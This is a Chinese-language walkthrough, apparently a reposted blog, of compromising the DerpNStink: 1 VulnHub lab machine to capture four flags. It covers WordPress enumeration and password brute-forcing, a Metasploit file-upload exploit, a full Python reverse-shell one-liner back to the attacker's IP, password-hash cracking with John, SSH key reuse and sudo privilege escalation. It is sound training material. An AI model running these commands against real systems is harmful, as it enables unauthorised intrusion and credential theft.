DerpNStink: 1渗透测试

靶机:DerpNStink: 1 <https://www.vulnhub.com/entry/derpnstink-1,221/>

攻击机:kail linux 2024

目标:获得4个flag

1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址

2,攻击机上做主机扫描发现靶机

靶机的IP地址192.168.23.134,攻击机IP地址192.168.23.128

3,对靶机进一步扫描

nmap -sS -sV -n -T4 -p- 192.168.23.134 

分别开启了ftp/21,ssh/22,http/80

4,对靶机进行目录扫描爆破

5,存在敏感目录信息泄露

有以下敏感目录

6,访问网页,得到第一个flag

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

7,发现第一个flag的时候有一个提示,提示需要添加hosts 文件进行解析 路径为:vim /etc/hosts 添加如下:

接下来对提示的页面操作

8,继续目录爆破操作

dirb http://derpnstink.local/ #进行目录扫描 发现weblog,继续探测

dirb http://derpnstink.local/weblog  #发现wp-admin

9,对页面做一个指纹识别

为WrodPress CMS框架

10,使用WPScan扫描

wpscan --url http://derpnstink.local/weblog -e e参数用于枚举用户名

枚举出来一个用户

10,对该页面进行弱口令爆破,得到密码admin

DeRPnStiNK Professional Services ‹ Log In

成功登录该页面。

11,这里扫描发现此页面为4.6.29版本

wpscan --url http://derpnstink.local/weblog/

而slideshow-gallery是wordpress的plugin

12,打开MSF 搜索 search Slideshow Gallery 看是否有可利用的模块,尝试利用

13,这里看出是任意文件上传漏洞,设置攻击参数

set rhosts 192.168.23.134 #设置目标IP地址

set wp_user admin  #设置账号

set wp_password admin  #设置密码

set targeturi /weblog  #设置路径

exploit #运行

14,成功获得shell

 

第一种方法得到flag2:直接进入页面查找

15,查看数据库配置文件,路径/var/www/html/weblog/wp-config.php

得到一对账户/密码:root/mysql

16,得到的账户密码用来登录http://derpnstink.local/php/phpmyadmin

17,在wp-posts表中查看到Flag2

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

18,获得shell,查看到www-data权限

python -c 'import pty; pty.spawn("/bin/bash")'  #pyton获取终端

19,反弹shell利用脚本

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

20,在16步的同时攻击机开启端口监听

发现当16步执行后获得了靶机的shell

21,获取可以交互的shell

python -c 'import pty; pty.spawn("/bin/bash")'

22,得到数据库配置文件的绝对路径:/var/www/html/weblog/wp-config.php

23,查看数据库配置文件,并筛选出来name/password

cat /var/www/html/weblog/wp-config.php

得到一对账户/密码:root/mysql

24,使用得到的账户密码登录数据库

mysql -u root -p mysql

查看数据库名:show databases;

使用wordpress库,并查看表名

use wordpress

show tables;

列出用户信息

select * from wp_users;

25,进行John爆破unclestinky账户被加密的密码

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > 1.txt

使用爆破字典之前先解压

john 1.txt --wordlist=/usr/share/wordlists/rockyou.txt

得到了账户/密码:unclestinky/wedgie57

26,在home页面下发现两个用户

 

第一种方法得到flag3:密码切换用户

27,尝试切换用户,发现stinky的密码正好是wedgie57

28,得到flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

第二种方法得到flag3FTP服务+SSH私钥

29,根据第3步端口扫描知道开启了ftp服务,可以尝试攻击机上ftp登录

密码/账户是:stinky/wedgie57

30,查看ftp服务器里面的私钥文件,路径:/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh

31,下载私钥文件到攻击机

32,ssh登录,给执行权限

ssh -i key.txt [email protected]

chmod 600

成功登录拿到flag

33,在第30步查看ftp的/files/network-logs目录下面发现一个文件

对话提示说修改密码的时候,进行了抓包

34,在stinkey用户的/~/Documents目录下发现流量包

35,scp 命令且使用下载的私钥文件将stinky的流量包文件拷入攻击机

scp -i key.txt [email protected]:/~/Documents/derpissues.pcap /root/1.pcap

36,查看流量包,过滤栏中过滤http协议,过滤字符串pwd

如此得到了账户/密码:mrderp/derpderpderpderpderpderpderp

37,尝试账户/密码进行ssh登录,登录成功

38,在该用户桌面目录下查看到一个文件,查看之

提示访问https://pastebin.com/RzK9WfGw

39,提示

这是考查的一个linux sudo命令知识点:

允许mrderp用户在主机上以root用户权限读写执行/home/mrderp/binaries/目录下derpy开头的文件

sudo -l #-l 显示出自己(执行sudo的使用者)的权限

40,根据提示操作

首先创建binaries/目录 mkdir binaries/

编辑一个derpy开头的可执行文件 echo '/bin/bash' >> derpy.sh

赋权 chmod 777 derpy.sh

41.执行该derpy.sh文件后获得root权限

42,得到第四个flag,flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

猜你喜欢

转载自blog.csdn.net/zhongyuekang820/article/details/143261789